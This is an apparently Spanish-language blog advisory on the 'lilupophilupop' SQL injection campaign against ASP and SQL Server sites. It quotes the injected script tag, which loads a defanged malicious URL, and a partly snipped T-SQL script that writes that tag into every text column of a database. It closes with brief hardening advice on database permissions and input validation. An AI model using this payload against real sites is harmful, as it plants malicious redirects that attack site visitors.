SQL Injection : lilupophilupop

Posted by: admin

Encontramos un hack que esta ocurriendo frecuentemente en sitios web, en principio bajo ASP y SQL Server. El mismo injecta código que intenta redirigir los links que tengamos hacia sitios maliciosos.

Fuente: http://isc.sans.edu/diary.html?storyid=12127

Se injecta lo siguiente, en varias de las tablas que tengamos.

“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>

 

El Script que se corre, segun la fuente que cito es:

 

declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in (‘——SNIP——-
IN EXEC(‘UPDATE ['+@T+'] SET ['+@C+']=””></title><script src=”XXXX://lilupophilupop.com/sl.php”></script><!–”+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>””></title><script” ‘) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+…………….

 

La primer solución puede ser revisar nuestro usuario de SQL para revisar que tenga solo permisos de datareader y datawriter, y crear un Role para ejecutar Stored Procedures.

Luego, tenemos que revisar nuestra aplicación para analizar todos los inputs de información que tenemos.

 

 

 

Comments are closed, but trackbacks and pingbacks are open.